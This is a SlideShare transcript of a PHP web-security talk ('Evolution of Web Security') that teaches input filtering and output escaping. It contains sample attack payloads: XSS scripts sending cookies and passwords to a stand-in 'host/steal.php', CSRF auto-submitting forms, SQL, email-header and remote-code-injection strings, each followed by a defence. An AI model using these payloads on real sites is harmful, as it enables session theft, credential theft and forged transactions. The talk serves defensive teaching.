SlideShare a Scribd company logo
1 of 63
Download to read offline
Evolution of
Web Security
    Chris Shiflett
@shiflett • shiflett.org
Web developer from Brooklyn, NY, and
Who am I?   founding member of Analog, a web design
            & development co-operative.
1. Fundamentals
Three Principles


Defense in depth
— Redundant safeguards are valuable.


Least privilege
— Grant as little freedom as possible.


Least complicated
— Complexity breeds mistakes.
Two Practices



Filter input.
— Ensure data coming in is valid.


Escape output.
— Ensure data going out is not misinterpreted.
Filter input. Escape output.




      Filter   Application   Escape
<?php

$clean = array();

if (ctype_alpha($_POST['name'])) {
    $clean['name'] = $_POST['name'];
} else {
    /* Error */
}

?>
<?php

$clean = array();

switch ($_POST['color']) {
    case 'red':
    case 'green':
    case 'blue':
        $clean['color'] = $_POST['color'];
        break;
    default:
        /* Error */
        break;
}

?>
<?php

$clean = array();

$colors = array('red', 'green', 'blue');

if (in_array($_POST['color'], $colors)) {
    $clean['color'] = $_POST['color'];
} else {
    /* Error */
}

?>
<?php

$clean = array();
$colors = array();

$colors['red'] = '';
$colors['green'] = '';
$colors['blue'] = '';

if (isset($colors[$_POST['color']])) {
    $clean['color'] = $_POST['color'];
} else {
    /* Error */
}

?>
<?php

$clean = array();

if (preg_match('/^d{5}$/',
    $_POST['zip'])) {
    $clean['zip'] = $_POST['zip'];
} else {
    /* Error */
}

?>
<?php

/* Content-Type: text/html; charset=UTF-8' */

$html = array();

$html['user'] = htmlentities($clean['user'],
                ENT_QUOTES,
                'UTF-8');

echo "<p>Welcome, {$html['user']}.</p>";

?>
Exploits
Cross-Site          Session
Scripting           Hijacking

Cross-Site          Email Injection
Request
Forgeries           Remote Code
                    Injection
SQL Injection

Session Fixation
Cross-Site Scripting

            1              2




                          HTML
Attacker   XSS   Target          Victim
                          XSS
echo $_GET['user'];




http://host/foo.php?user=%3Cscript%3E…




          echo '<script>…';
Steal Cookies


<script>
document.location =
    'http://host/steal.php?cookies=' +
    encodeURI(document.cookie);
</script>
Steal Passwords


<script>
document.forms[0].action =
'http://host/steal.php';
</script>
Steal Saved Passwords


<form name="steal" action="http://host/steal.php">

<input type="text" name="username"
    style="display: none" />
<input type="password" name="password"
    style="display: none" />

<input type="image" src="image.png" />
</form>
Short & Simple


<script src="http://host/evil.js"></script>
Character Encoding


$string = "<script>alert('XSS');</script>";
$string = mb_convert_encoding($string, 'UTF-7');
 
echo htmlentities($string);




             Google XSS Example
     http://shiflett.org/blog/2005/dec/google-xss-example
Stop It!

FIEO.

Use valid HTML.
— http://validator.w3.org/


Use existing solutions.
— PHP developers, use htmlentities() or htmlspecialchars().
— Make sure you indicate the character encoding!


Need to allow HTML?
— Use HTML Purifier, even if you’re not using PHP:
  http://htmlpurifier.org/
Cross-Site Request Forgeries

             1             2




  Attacker   ?   Victim   CSRF   Target
CSRF


Because the attack is carried out by
the victim, CSRF can bypass:
— HTTP auth
— Session-based auth
— Firewalls
— &c.
<form action="buy.php" method="post">
                     <input type="hidden" name="isbn"
                         value="059600656X" />
                     <input type="submit" value="Buy" />
                     </form>
    Buy




POST /buy.php HTTP/1.1
Host: host
Cookie: PHPSESSID=1234
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

isbn=059600656X
Forging GET

<img src="http://host/buy.php?isbn=059600656X" />




GET /buy.php?isbn=059600656X HTTP/1.1
Host: host
Cookie: PHPSESSID=1234
Forging POST
<iframe style="visibility: hidden" name="secret"></iframe>

<form name="buy" action="http://host/buy.php" method="post" target="secret">
<input type="hidden" name="isbn" value="059600656X" />
</form>

<script type="text/javascript">document.buy.submit();</script>




POST /buy.php HTTP/1.1
Host: host
Cookie: PHPSESSID=1234
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

isbn=059600656X
CSRF Exploits


  Amazon (Fixed?)
 http://shiflett.org/amazon.php




      Digg (Fixed)
  http://4diggers.blogspot.com/
Steal Cookies (Improved)


 <script>
 new Image().src =
     'http://host/steal.php?cookies=' +
     encodeURI(document.cookie);
 </script>
Stop It!

$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
$html['token'] = htmlentities($token, ENT_QUOTES,
                 'UTF-8');




<input type="hidden"
       name="token"
       value="<?php echo $html['token']; ?>" />
SQL Injection

            1              2




                          SQL
Attacker   SQL   Target         Database
                          SQL
SELECT   count(*)
FROM     users
WHERE    username = '{$_POST['username']}'
AND      password = '…'




                      chris' /*




SELECT   count(*)
FROM     users
WHERE    username = 'chris' /*'
AND      password = '…'
Stop It!


         FIEO.

         Use prepared statements.
         — PHP developers, use PDO.




addslashes() Versus mysql_real_escape_string()
 http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
Session Fixation



http://host/login.php?PHPSESSID=1234
Stop It!


Regenerate the session identifier.
— PHP developers, session_regenerate_id(TRUE).


Do this whenever the privilege level
changes.
Session Hijacking

Attacker impersonates a victim.

In PHP, by default, only requires a valid
session identifier.

Session identifier obtained using:
— Prediction
— Capture
— Fixation
Stop It!

Understand how sessions work.

Minimize session identifier exposure.
— SSL
— Separate domain for embedded resources


Trending
— https://panopticlick.eff.org/
— More on this later…
Email Injection
mail('chris@example.org', 'Feedback', '...',
     "From: {$_POST['email']}");




fake@example.orgrnBcc: victim@example.orgrnBcc: …




To: chris@example.org
Subject: Feedback
From: fake@example.org
Bcc: victim@example.org
Bcc: …
Stop It!



FIEO.
— http://iamcal.com/publish/articles/php/parsing_email
— PHP developers, use ctype_print() as defense in depth.
Remote Code Injection




  Attacker     Target
include "{$_COOKIE['type']}.php";




 Cookie: type=http://host/inject.inc?




include "http://host/inject.inc?.php";
Remote Code Injection



This example exploits allow_url_fopen.

PHP 5 has allow_url_include.
— By default, allow_url_include is disabled.
include "{$_GET['type']}.php";




POST /script.php?type=php://input%00 HTTP/1.1
Host: host
Content-Type: application/x-www-form-urlencoded
Content-Length: ?

?




include "php://input";
Stop It!



FIEO.
— If at all possible, use a white list.
2. Emerging Trends
Ajax


“The name is shorthand for Asynchronous
   JavaScript + XML, and it represents a
  fundamental shift in what’s possible on
                 the Web.”

         — Jesse James Garrett
Ajax


  “Client-side techniques & technologies
    that allow two-way communication
between the client and the server without
            reloading the page.”
Cross-Domain Ajax


Victim
         1. XMLHttpRequest
                                              Target
         2. HTML form + victim’s token
 JS
         3. XMLHttpRequest + victim’s token
XSS + Ajax + CSRF


Victim
         1. XMLHttpRequest
                                              Target
         2. HTML form + victim’s token
 XSS
         3. XMLHttpRequest + victim’s token
Worms

XSS is a perfect platform for CSRF.

CSRF attacks can exploit XSS
vulnerabilities.

Victims can become attackers.

Rinse. Repeat.
Browser Hijacking
http://shiflett.org/blog/2006/oct/using-csrf-for-browser-hijacking




 Myspace CSRF and XSS Worm (Samy)
http://shiflett.org/blog/2005/oct/myspace-csrf-and-xss-worm-samy
Cross-Domain Ajax


<cross-domain-policy>
    <allow-access-from domain="*"/>
</cross-domain-policy>




               Thanks, Flash!
Cross-Domain Ajax

   domain="*"    API domain      Vulnerable?


      No         yahoo.com           No


      No        youtube.com          No


      Yes       api.flickr.com       No


     Yes No      adobe.com         Yes No
JavaScript Hijacking

           1             2




Attacker   ?   Victim   CSRF   Target




           4             3
<script src="http://host/json.php"></script>




     [{"email": "chris@shiflett.org"}]




     JavaScript Hijacking Demo
          http://mochikit.com/fortify_fud/
JavaScript Hijacking


 “If you audit your application for CSRF
    flaws, you’ve defeated this attack.
 Moreover, the well-known, pre-existing
exploits for CSRF are actually worse than
               this attack.”

           — Thomas Ptacek
3. Ideas for the Future
Trending
   “When you visit a web site, you are
    allowing that site to access a lot of
   information about your computer’s
configuration. Combined, this information
   can create a kind of fingerprint — a
 signature that could be used to identify
         you and your computer.”

                Panopticlick
             https://panopticlick.eff.org/
Trending



“Not the intent, but Panopticlick from @eff
  would be useful for preventing session
                 hijacking.”
      — http://twitter.com/shiflett/status/8562663352
Trending

Establish trends to help detect
anomalies.

Trends can be based on identity or
behavior.

Trending is imperfect; use as defense in
depth.
Security-Centered Design

        Webstock 2010

     Thursday, 18 February
      After lunch (13:25)

         Illot Theatre
Slides


         http://slideshare.net/shiflett


http://shiflett.org/evolution-of-web-security.pdf
Feedback?

Follow me on Twitter.
— @shiflett


Comment on my blog.
— shiflett.org


Email me.
— chris@shiflett.org


Work with me.
— analog.coop

More Related Content

What's hot

Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020BGA Cyber Security
 
Open Source IDS Tools: A Beginner's Guide
Open Source IDS Tools: A Beginner's GuideOpen Source IDS Tools: A Beginner's Guide
Open Source IDS Tools: A Beginner's GuideAlienVault
 
IOS Cisco - Cheat sheets
IOS Cisco - Cheat sheetsIOS Cisco - Cheat sheets
IOS Cisco - Cheat sheetsAlejandro Marin
 
Fido Technical Overview
Fido Technical OverviewFido Technical Overview
Fido Technical OverviewFIDO Alliance
 
Creación de entornos de desarrollo con Vagrant
Creación de entornos de desarrollo con VagrantCreación de entornos de desarrollo con Vagrant
Creación de entornos de desarrollo con VagrantCarlos Gimeno Yáñez
 
VoIP (Voice Over IP) güvenliği nasıl sağlanmaktadır?
VoIP (Voice Over IP) güvenliği nasıl sağlanmaktadır?VoIP (Voice Over IP) güvenliği nasıl sağlanmaktadır?
VoIP (Voice Over IP) güvenliği nasıl sağlanmaktadır?İsmail ŞEN
 
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...CODE BLUE
 
CCNA Certificate
CCNA CertificateCCNA Certificate
CCNA Certificatem_mun17
 
Networking and penetration testing
Networking and penetration testingNetworking and penetration testing
Networking and penetration testingMohit Belwal
 
CCNAv5 - S4: Chapter 1 Hierarchical Network Design
CCNAv5 - S4: Chapter 1 Hierarchical Network DesignCCNAv5 - S4: Chapter 1 Hierarchical Network Design
CCNAv5 - S4: Chapter 1 Hierarchical Network DesignVuz Dở Hơi
 
Cisco nexus 7009 overview
Cisco nexus 7009 overviewCisco nexus 7009 overview
Cisco nexus 7009 overviewHamza Al-Qudah
 
ITN_Module_2.pptx
ITN_Module_2.pptxITN_Module_2.pptx
ITN_Module_2.pptxAshok R
 
Fundamentos de Microsoft .NET y C#
Fundamentos de Microsoft .NET y C#Fundamentos de Microsoft .NET y C#
Fundamentos de Microsoft .NET y C#Humberto Jaimes
 
Odoo (OpenERP) - Creating a module
Odoo (OpenERP) - Creating a moduleOdoo (OpenERP) - Creating a module
Odoo (OpenERP) - Creating a moduleTarun Behal
 
Chapter 17 : static routing
Chapter 17 : static routingChapter 17 : static routing
Chapter 17 : static routingteknetir
 

What's hot (20)

Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
 
Open Source IDS Tools: A Beginner's Guide
Open Source IDS Tools: A Beginner's GuideOpen Source IDS Tools: A Beginner's Guide
Open Source IDS Tools: A Beginner's Guide
 
IOS Cisco - Cheat sheets
IOS Cisco - Cheat sheetsIOS Cisco - Cheat sheets
IOS Cisco - Cheat sheets
 
CCNA presentation.
CCNA presentation.CCNA presentation.
CCNA presentation.
 
Tools kali
Tools kaliTools kali
Tools kali
 
Fido Technical Overview
Fido Technical OverviewFido Technical Overview
Fido Technical Overview
 
Creación de entornos de desarrollo con Vagrant
Creación de entornos de desarrollo con VagrantCreación de entornos de desarrollo con Vagrant
Creación de entornos de desarrollo con Vagrant
 
VoIP (Voice Over IP) güvenliği nasıl sağlanmaktadır?
VoIP (Voice Over IP) güvenliği nasıl sağlanmaktadır?VoIP (Voice Over IP) güvenliği nasıl sağlanmaktadır?
VoIP (Voice Over IP) güvenliği nasıl sağlanmaktadır?
 
Nat pat
Nat patNat pat
Nat pat
 
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
 
CCNA Certificate
CCNA CertificateCCNA Certificate
CCNA Certificate
 
Networking and penetration testing
Networking and penetration testingNetworking and penetration testing
Networking and penetration testing
 
CCNAv5 - S4: Chapter 1 Hierarchical Network Design
CCNAv5 - S4: Chapter 1 Hierarchical Network DesignCCNAv5 - S4: Chapter 1 Hierarchical Network Design
CCNAv5 - S4: Chapter 1 Hierarchical Network Design
 
Cisco nexus 7009 overview
Cisco nexus 7009 overviewCisco nexus 7009 overview
Cisco nexus 7009 overview
 
ITN_Module_2.pptx
ITN_Module_2.pptxITN_Module_2.pptx
ITN_Module_2.pptx
 
Honeypots
HoneypotsHoneypots
Honeypots
 
Fundamentos de Microsoft .NET y C#
Fundamentos de Microsoft .NET y C#Fundamentos de Microsoft .NET y C#
Fundamentos de Microsoft .NET y C#
 
Odoo (OpenERP) - Creating a module
Odoo (OpenERP) - Creating a moduleOdoo (OpenERP) - Creating a module
Odoo (OpenERP) - Creating a module
 
Voice over IP
Voice over IPVoice over IP
Voice over IP
 
Chapter 17 : static routing
Chapter 17 : static routingChapter 17 : static routing
Chapter 17 : static routing
 

Viewers also liked

Web Security
Web SecurityWeb Security
Web SecurityTripad M
 
Security-Centered Design
Security-Centered DesignSecurity-Centered Design
Security-Centered DesignChris Shiflett
 
Web Security attacks and defense
Web Security attacks and defenseWeb Security attacks and defense
Web Security attacks and defenseJose Mato
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012jakobkorherr
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
Security in Web 2.0, Social Web and Cloud
Security in Web 2.0, Social Web and CloudSecurity in Web 2.0, Social Web and Cloud
Security in Web 2.0, Social Web and CloudITDogadjaji.com
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Jim Manico
 
Cisco Study: State of Web Security
Cisco Study: State of Web Security Cisco Study: State of Web Security
Cisco Study: State of Web Security Cisco Canada
 
Modern Web Security
Modern Web SecurityModern Web Security
Modern Web SecurityBill Condo
 
Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security RisksSperasoft
 
Introduction to Web security
Introduction to Web securityIntroduction to Web security
Introduction to Web securityjeyaselvir
 
Web Server Web Site Security
Web Server Web Site SecurityWeb Server Web Site Security
Web Server Web Site SecuritySteven Cahill
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityYnon Perek
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity George Boobyer
 
Tutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the WebTutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the Webdpd
 

Viewers also liked (20)

Web Security
Web SecurityWeb Security
Web Security
 
Security-Centered Design
Security-Centered DesignSecurity-Centered Design
Security-Centered Design
 
Web Security attacks and defense
Web Security attacks and defenseWeb Security attacks and defense
Web Security attacks and defense
 
Introduction to web security @ confess 2012
Introduction to web security @ confess 2012Introduction to web security @ confess 2012
Introduction to web security @ confess 2012
 
Web Security
Web SecurityWeb Security
Web Security
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
Security in Web 2.0, Social Web and Cloud
Security in Web 2.0, Social Web and CloudSecurity in Web 2.0, Social Web and Cloud
Security in Web 2.0, Social Web and Cloud
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
 
Cisco Study: State of Web Security
Cisco Study: State of Web Security Cisco Study: State of Web Security
Cisco Study: State of Web Security
 
Web Security
Web SecurityWeb Security
Web Security
 
Modern Web Security
Modern Web SecurityModern Web Security
Modern Web Security
 
Top 10 Web App Security Risks
Top 10 Web App Security RisksTop 10 Web App Security Risks
Top 10 Web App Security Risks
 
Introduction to Web security
Introduction to Web securityIntroduction to Web security
Introduction to Web security
 
Web security
Web securityWeb security
Web security
 
Web Server Web Site Security
Web Server Web Site SecurityWeb Server Web Site Security
Web Server Web Site Security
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Extreme security in web servers
Extreme security in  web serversExtreme security in  web servers
Extreme security in web servers
 
DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity DrupalCamp London 2017 - Web site insecurity
DrupalCamp London 2017 - Web site insecurity
 
Web Security
Web SecurityWeb Security
Web Security
 
Tutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the WebTutorial 09 - Security on the Internet and the Web
Tutorial 09 - Security on the Internet and the Web
 

Similar to Evolution Of Web Security

The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedPrathan Phongthiproek
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011Samvel Gevorgyan
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSlawomir Jasek
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSecuRing
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure codingHaitham Raik
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooNahidul Kibria
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In PhpAkash Mahajan
 
Web Application Security in Rails
Web Application Security in RailsWeb Application Security in Rails
Web Application Security in RailsUri Nativ
 

Similar to Evolution Of Web Security (20)

The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure coding
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs too
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
XSS
XSSXSS
XSS
 
Cross Site Attacks
Cross Site AttacksCross Site Attacks
Cross Site Attacks
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In Php
 
H4x0rs gonna hack
H4x0rs gonna hackH4x0rs gonna hack
H4x0rs gonna hack
 
Web Application Security in Rails
Web Application Security in RailsWeb Application Security in Rails
Web Application Security in Rails
 

Recently uploaded

WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 

Recently uploaded (20)

WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
